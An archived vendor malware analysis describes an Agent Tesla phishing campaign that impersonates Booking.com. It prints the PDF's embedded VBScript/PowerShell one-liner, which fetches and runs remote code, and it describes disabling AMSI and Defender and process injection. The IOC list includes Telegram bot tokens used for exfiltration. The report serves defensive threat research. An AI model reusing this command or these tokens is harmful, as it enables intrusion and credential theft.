{
	"id": "06c8766d-7aa1-4f94-9bd3-cc96f3338744",
	"created_at": "2026-04-06T00:22:19.596483Z",
	"updated_at": "2026-04-10T03:20:29.871253Z",
	"deleted_at": null,
	"sha1_hash": "9f28f99f61e256211d0df86e5bf690d51237e443",
	"title": "Online Travelers at Risk: Agent Tesla Malware Attacks Travel Industry",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1277149,
	"plain_text": "Online Travelers at Risk: Agent Tesla Malware Attacks Travel\r\nIndustry\r\nBy Mayur Sewani\r\nPublished: 2024-02-26 · Archived: 2026-04-05 22:57:17 UTC\r\nToday, we are going to look at one of the similar campaigns which is delivered via email as a PDF attachment and\r\nends up downloading a RAT leaving the system infected.\r\nThe email here is an example of scamming and brand impersonation where sender is seeking a refund of a\r\nreservation made at Booking.com and asking recipient to check the attached PDF for the card statement. Fig.1\r\nshows email containing PDF attachment.\r\nExecution chain\r\nAnalyzing malicious PDF\r\nhttps://www.forcepoint.com/blog/x-labs/agent-tesla-malware-attacks-travel-industry\r\nPage 1 of 11\n\nWe can dig into attached PDF to find attributes which generally used by malicious actors. Here we are first\r\nstatically analyzing PDF using PDFiD which scans the file looking for certain PDF keywords and allows us to\r\nidentify malicious PDF contents.\r\nIn Fig. 1, we can see PDF contains 7 obj, 7 endobj, 5 stream, and 1 ObjStm parameters.\r\nFurther we can use pdf-parser to view the content of the PDF. In this case, we’ll focus on the /ObjStm which\r\ngenerally hides scripts and URLs.\r\nObjStm from this file contains a script and an embedded URL shown in Fig. 2:\r\nhttps://www.forcepoint.com/blog/x-labs/agent-tesla-malware-attacks-travel-industry\r\nPage 2 of 11\n\nWe can also use PDFStreamDumper to check obj streams:\r\nFrom the objects in the PDF, we can see it uses two different methods to download the next stage payload:\r\n1. User Click on fake pop-up message: Action URL in PDF [/URI/Type /Action/URI\r\n(hxxps://bit[.]ly/newbookingupdates)] which connects to malicious URL\r\nhxxps://bit[.]ly/newbookingupdates and then redirects to hxxps://bio0king[.]blogspot[.]com/ to download\r\nnext stage javascript payload.\r\nhttps://www.forcepoint.com/blog/x-labs/agent-tesla-malware-attacks-travel-industry\r\nPage 3 of 11\n\n2. Parallelly it has embedded vbscript ExecuteGlobal code or in some files JavaScript code to download\r\ndirectly final stage remote powershell payload\r\nCode :”\u003c\r\n(vbscript:ExecuteGlobal\\(\"CreateObject\\(\"\"WScript.Shell\"\"\\).Run\"\"powershell -ep Bypass -c\r\n[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;$\\(irm\r\nhtloctmain25[.]blogspot[.]com//////////////atom.xml\\) | . \\('i*\u0026*\u0026\u0026*x'\\).replace\\('*\u0026*\u0026\u0026*','e'\\);Start-Sleep -\r\nSeconds 5\"\",0:Close\"\\))/F (\\\\..\\\\..\\\\..\\\\Windows\\\\System32\\\\mshta)\u003e\u003e”\r\nhttps://www.forcepoint.com/blog/x-labs/agent-tesla-malware-attacks-travel-industry\r\nPage 4 of 11\n\nOnce a user clicks on the link from the PDF, the URL further downloads an Obfuscated JavaScript: Booking.com-1728394029.js\r\nObfuscated JavaScript\r\nIt contains very long name arrays and string concatenation.\r\nhttps://www.forcepoint.com/blog/x-labs/agent-tesla-malware-attacks-travel-industry\r\nPage 5 of 11\n\nOn deobfuscating JS in Fig. 7, we found it is trying to connect to\r\n“htloctmain25[.]blogspot.com/////////////////////////atom.xml” which further redirects to\r\n“hxxps://bitbucket[.]org/!api/2.0/snippets/nigalulli/eqxGG9/a561b2b0d79b4cc9062ac8ef8fbc0659df660611/files/file”\r\nto download next stage PowerShell payload , invoking PowerShell and later deleting the script.\r\nOn execution, the downloaded PowerShell uses various techniques bears strong obfuscation and drops .dll file\r\nwhich is related to Agent Tesla malware family. Initially it searches for critical system processes [RegSvcs.exe,\r\nmshta.exe, Wscript.exe, msbuild.exe] and tries to stop them forcefully.\r\nObfuscation:\r\nPowerShell also contains multiple variables having multi-level binary obfuscation and used \".replace()\" functions\r\nmultiple times to replace special characters like '*', '^' and '-' with binary substrings. It contains a function to\r\nconvert formed binary stream into ASCII text. It uses this obfuscation to perform defense evasions.\r\nWhile execution it replaces those special characters and then convert binary stream into ascii text to form\r\nadditional PowerShell scripts and .dll payload. Shown in Fig. 7.1\r\nhttps://www.forcepoint.com/blog/x-labs/agent-tesla-malware-attacks-travel-industry\r\nPage 6 of 11\n\nIn Fig 7.2, after de-obfuscating the script, it is found to be modifying registries sets up CLSID in the registry with\r\na DLL name “C:\\IDontExist.dll”. The registry changes also affects AMSI and disables it by overriding the\r\nMicrosoft Defender COM objects.\r\nIn Fig 7.3, we see the script adds exclusion to extensions, paths, and processes in AV to execute the malware\r\nwithout getting detected. Then it sets preferences and disable security features executed with admin privileges.\r\nNext, the script makes changes to registry, services, and firewalls using netsh.\r\nhttps://www.forcepoint.com/blog/x-labs/agent-tesla-malware-attacks-travel-industry\r\nPage 7 of 11\n\nAfter dropping the final .dll file, it performs process injection in Regsvcs.exe and MSbuild.exe. This RegSvcs.exe\r\nconnects to “api[.]ipify[.]org” to get the public IP address of the system and it with the goal of stealing credentials\r\nand other personal data from web Browsers and stealing of personal data. It then sends the exfiltrated data to a\r\nprivate Telegram chat room.\r\nThe PowerShell script again connects with different server “htljan62024[.]blogspot[.]com//////////atom.xml” and\r\ntries to download another similar PowerShell payload with another {random}[.]blogspot[.]com URL for\r\npersistence. After performing all the operations, the PowerShell drops {random-name}.dll file, executes it and\r\ndeletes itself.\r\nConclusion:\r\nWe saw Agent Tesla malware activity increase at the start of the pandemic. As hackers continue to use it in the\r\nyears since, they continue to evolve techniques and use new tactics for successful delivery and execution. Here,\r\nwe found how the malware campaign outlines the delivery of the malware by PDF which is received via email and\r\nimpersonated one of the leading travel agencies. The infection process is followed by fake email having invoice of\r\na booking as a PDF attachment which possess downloading of malicious JavaScript which on execution\r\ndownloads a PowerShell script. The PowerShell script has sophisticated and multi-stage obfuscation strategy\r\nwhich on de-obfuscating found to be doing series of techniques and loads Agent Tesla malware. On successful\r\ninfiltration of the malware, it allows attackers to conduct malicious activities such as data theft and executing\r\ncommands on compromised systems.\r\nProtection statement\r\nForcepoint customers are protected against this threat at the following stages of attack:\r\nhttps://www.forcepoint.com/blog/x-labs/agent-tesla-malware-attacks-travel-industry\r\nPage 8 of 11\n\nStage 2 (Lure) – Malicious attachments associated with these attacks are identified and blocked.\r\nStage 3 (Redirect) - The redirection to the BlogSpot URL is categorized and blocked under security\r\nclassification.\r\nStage 5 (Dropper File) - The dropper files are added to Forcepoint malicious database and are blocked.\r\nStage 6 (Call Home) - Blocked C\u0026C abused telegram private chat rooms\r\nIOCs\r\nSpoofed Senders:\r\nPaola@intel-provider[.]com\r\nbooking[.]com@stellantises[.]com\r\nbooking[.]com@urbanstayshotel[.]com\r\nBooking[.]com@b00king[.]biz\r\nBooking[.]com@bitlabwallets[.]com\r\nBooking[.]com@drokesoftware[.]com\r\nBooking[.]com@generaldistributes[.]com\r\nPDF Hashes\r\nf7c625f1d3581aa9a3fb81bb26c02f17f0a4004e\r\nc82467b08c76b2e7a2239e0e1c7c5df7519316e2\r\n7e031b1513aa65874e9b609d339b084a39036d8f\r\nhttps://www.forcepoint.com/blog/x-labs/agent-tesla-malware-attacks-travel-industry\r\nPage 9 of 11\n\n6d57264a6b55f7769141a6e2f3ce9b1614d76090\r\nJavaScript Hashes\r\na1c7b79e09df8713c22c4b8f228af4869502719a\r\n67ccb505a1e6f3fa18e2a546603f8335d777385b\r\n9907895c521bddd02573ca5e361490f017932dbe\r\nPowerShell Hashes\r\na1919c59ab67de195e2fe3a835204c9f1750f319\r\n83e8d610343f2b57a6f6e4608dec6f030e0760da\r\n9753ef890a63b7195f75b860e255f0b36a830b37\r\nDLL Hashes\r\na7dd09b4087fd620ef59bed5a9c51295b3808c35\r\nffcd7a3a80eb0caf019a6d30297522d49311feec\r\nc441863097e7cab51728656037c01ffa257ffcbf\r\nMalicious URLs\r\nhotelofficeewn[.]blogspot[.]com////////////atom.xml\r\nhttps://www.forcepoint.com/blog/x-labs/agent-tesla-malware-attacks-travel-industry\r\nPage 10 of 11\n\nbo0klng[.]blogspot[.]com/\r\nbit[.]ly/newbookingupdates\r\nbio0king[.]blogspot[.]com/\r\nhtloctmain25[.]blogspot[.]com//////////////atom.xml\r\nbitbucket[.]org/!api/2.0/snippets/nigalulli/eqxGG9/a561b2b0d79b4cc9062ac8ef8fbc0659df660611/files/file\r\nbooking-c.blogspot[.]com////////atom[.]xml\r\nhtlfeb24[.]blogspot[.]com//////////////////////////////atom.xml\r\nbit[.]ly/newbookingupdate\r\n4c1c6c2c-3624-42cb-a147-\r\n0b3263050851[.]usrfiles[.]com/ugd/4c1c6c_a6f8a2e6200e45219ab51d2fea9439ff.txt\r\nC2s\r\nApi[.]telegram[.]org/bot6796626947:AAGohe-IHhj5LD7VpBLcRBukReMwBcOmiTo/sendDocument\r\nApi[.]telegram[.]org/bot6775303908:AAHd23oi4Hfc-xrVIpxaoy_LMKRuUmb2KZM/sendDocument\r\nSource: https://www.forcepoint.com/blog/x-labs/agent-tesla-malware-attacks-travel-industry\r\nhttps://www.forcepoint.com/blog/x-labs/agent-tesla-malware-attacks-travel-industry\r\nPage 11 of 11",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA"
	],
	"references": [
		"https://www.forcepoint.com/blog/x-labs/agent-tesla-malware-attacks-travel-industry"
	],
	"report_names": [
		"agent-tesla-malware-attacks-travel-industry"
	],
	"threat_actors": [],
	"ts_created_at": 1775434939,
	"ts_updated_at": 1775791229,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/9f28f99f61e256211d0df86e5bf690d51237e443.pdf",
		"text": "https://archive.orkl.eu/9f28f99f61e256211d0df86e5bf690d51237e443.txt",
		"img": "https://archive.orkl.eu/9f28f99f61e256211d0df86e5bf690d51237e443.jpg"
	}
}